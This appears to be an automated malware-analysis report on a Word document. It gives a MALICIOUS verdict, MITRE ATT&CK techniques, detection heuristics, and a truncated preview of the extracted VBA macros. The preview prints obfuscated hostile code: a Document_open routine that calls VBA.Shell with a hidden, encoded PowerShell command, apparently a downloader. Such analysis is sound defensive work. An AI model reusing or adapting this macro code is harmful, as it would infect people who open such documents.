Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a Microsoft Office Word document containing VBA macros, specifically a Document_Open macro that executes a Shell() command, which indicates an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Valyria-6874677-0' further supports its malicious nature.
Heuristics (6)

- ClamAV: Doc.Malware.Valyria-6874677-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6874677-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11269 bytes |

SHA-256: 2b9454bd35ea4b7fe0ac70476726f216e2e9dbb3680d0c8e94b1275134d10174

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "zmzacfKXZmGN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function lEDuh() On Error Resume Next sqWNMw = Tan(54876) Growrd = Tan(56470) oKcnk = ZLObpX JsBujD = CDbl(viJjv) TPqbT = jicIX fajFPh = CDbl(sVAdi * CDbl(IhFXnq + Int(DCoaMN * Rnd(75370)) * oKEwZL * Log(24614 * mHwPL - TKwEpb + Fix(51)))) qiTPz = Tan(65238) IPioUE = Tan(39551) jicOvU = dHOTvG zZDRjN = CDbl(rYYMD) ZzOCRb = PuXdU anbwXY = CDbl(uHhkd * CDbl(tUsjib + Int(LmqBu * Rnd(12477)) * tbQIMR * Log(59924 * vsRcJ - pWvdRl + Fix(51)))) kLhTr = Tan(23554) kPVTX = Tan(6992) cwSOL = NWfXFE EIiSvP = CDbl(zmjjA) VaLvW = SjvfQM FjPTmD = CDbl(wXCCZw * CDbl(cHJEh + Int(tAbhA * Rnd(82936)) * NAkWSZ * Log(73770 * BvOho - MEvQoO + Fix(51)))) jdkODu = Tan(41510) TsfBun = Tan(85788) ztMvmY = OSPhn rKdEb = CDbl(LmqiM) hvfTfj = YvYjP iKDaw = CDbl(lIIcSG * CDbl(jmNXc + Int(fMYjwz * Rnd(69773)) * zRdPj * Log(48073 * AThoH - kooRu + Fix(51)))) lEDuh = dUqNTiEAQVp + VBA.Shell(mpQcvIAikl + Chr(tQmpS + vbKeyP + SVFRiaij) + "owers" + TPOwucort + AKzQqV + kCnVZ + ULzbvSo, 94758 - 94758) JQbTQ = Tan(69001) cvAUfY = Tan(28372) qQfppc = vEwwJ UrIWi = CDbl(oszQu) CIPDV = fVYUN MIYNM = CDbl(KSTNT * CDbl(NARvjS + Int(vjrQPq * Rnd(57399)) * WZUwZ * Log(49674 * sBsOH - ZKXDLO + Fix(51)))) bBaaZ = Tan(98775) vsjXzX = Tan(76774) BLpXK = rZbkSX XNjac = CDbl(ipIqD) ThFlS = ABjYTN RNZTfw = CDbl(Usswzi * CDbl(vjsNS + Int(wsqMk * Rnd(11064)) * imDkG * Log(93591 * lObGuc - zIStXj + Fix(51)))) End Function Private Sub Document_open() On Error Resume Next piuUN = Tan(12943) MrbwP = Tan(37903) mMqOX = ziPTJ LEXvkG = CDbl(CzZld) DHSjzl = dQjzWM UcKOm = CDbl(EJXmpz * CDbl(VAmmoV + Int(jiQGqq * Rnd(26887)) * qVmQOQ * Log(86750 * fTHVIz - AXrUB + Fix(51)))) ddLRww = Tan(6420) ZqaMq = Tan(38318) bwLlCf = AwGqZR zwYCY = CDbl(ubhjkf) 
lQPTWp = Sicaw Yuzdh = CDbl(vVYZX * CDbl(oYoHmh + Int(SjWVN * Rnd(68164)) * iPktf * Log(74819 * YERRV - qpFYl + Fix(51)))) lEDuh zKPECu = Tan(48319) srbff = Tan(61559) mNACs = bnIJVs UiFLpL = CDbl(NKrCsw) QiWfQv = rcLMSa cIbGqA = CDbl(qRWzD * CDbl(mjLddp + Int(XwDPR * Rnd(57947)) * pfZTE * Log(10869 * WBozMt - fVrCw + Fix(51)))) wDunY = Tan(36475) mPitOf = Tan(49838) rwcIA = IVdoJ VdDXKc = CDbl(rbGCXv) PjaHC = fOijjP FcJEz = CDbl(kCdCt * CDbl(WlYPGz + Int(UfbYl * Rnd(88508)) * QsbWz * Log(43858 * SVpoz - YoQtpC + Fix(51)))) End Sub Attribute VB_Name = "ANhITwOwsmRo" Function TPOwucort() On Error Resume Next KsPmQ = cXHrF FAqQIZ = Tan(56605) MkWvK = Tan(84194) lFTtY = GTKsn uVlbvj = CDbl(lJoVD * CDbl(vaATTb + Int(WQZHYm * Rnd(68233)) * PMdkUh * Log(14921 * bJbMsG - zkQud + Fix(51)))) dCIzSV = CDbl(KkiRnp) hCUVGnJ = "HeL" + "L -joIN ( " + "'20P82u115d122" + "~105P99d115~" + "16S13u16E94P85" OiwjKG = lsYksH hPjLU = Tan(63511) JMnUL = Tan(15043) ozGSMZ = Smzidq jpzAVJ = CDbl(TGvRuF * CDbl(kXQWJ + Int(BcDZD * Rnd(24479)) * jpYZNP * Log(31713 * WpTqwC - qLBSU + Fix(51)))) EmXzJd = CDbl(iiVDip) GvkcXAYjoAY = "A71d29S95J" + "82l90f85A83d" + "68J16E66d81~94" + "~84J95f93S11P20" + "P117P95A66u127P" + "101~86u16u1" + "3l16u9" + "4d85P71E2" LrXZn = FnzQj mOios = Tan(20365) ZoOti = Tan(40578) kRWhV = qIpwn pTjmiJ = CDbl(PTtzMQ * CDbl(qEtHJ + Int(UKdRaz * Rnd(79085)) * pdCawN * Log(35724 * tCkkIF - qRJQA + Fix(51)))) pPMiUc = CDbl(qqZPCC) mzwBLSnAiYG = "9l95E" + "82E90J85E" + "83l68u16A99" + "~73f6" jMPKsA = UHGZZ dFjOiw = Tan(86991) iCOUmE = Tan(6194) tdpFPf = OzsuNz bXLOE = CDbl(ZBQvvf * CDbl(XbVmKz + Int(OhBRJ * Rnd(14558)) * qnGWVr * Log(39441 * rJXAHO - NuKkiH + Fix(51)))) tFzMi = CDbl(KZZod) oEiztQ = "7~68u85P93A30S" + "126l85" + "~68J3" + "0S103d85l82A11" + "5f92u89A85" + "E94" TPOwucort = hCUVGnJ + GvkcXAYjoAY + mzwBLSnAiYG + oEiztQ End Function Function AKzQqV() On Error Resume Next DTfKz = iFGDF zatiS = Tan(31199) DKAmGI = Tan(47031) WPSCuf = CUlvEL RqYW ... 
(truncated)